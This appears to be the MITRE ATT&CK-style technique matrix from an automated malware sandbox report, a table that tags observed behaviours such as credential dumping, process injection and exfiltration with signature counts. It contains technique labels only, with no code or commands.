| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Valid Accounts | Windows Management Instrumentation | Path Interception | Process Injection11 | Virtualization/Sandbox Evasion1 | OS Credential Dumping | Query Registry1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Encrypted Channel2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
| Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | Security Software Discovery21 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
| Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection11 | Security Account Manager | Virtualization/Sandbox Evasion1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
| Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Timestomp1 | NTDS | File and Directory Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud |
| Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | System Information Discovery22 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
| Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | Remote System Discovery1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |

Behavior Graph
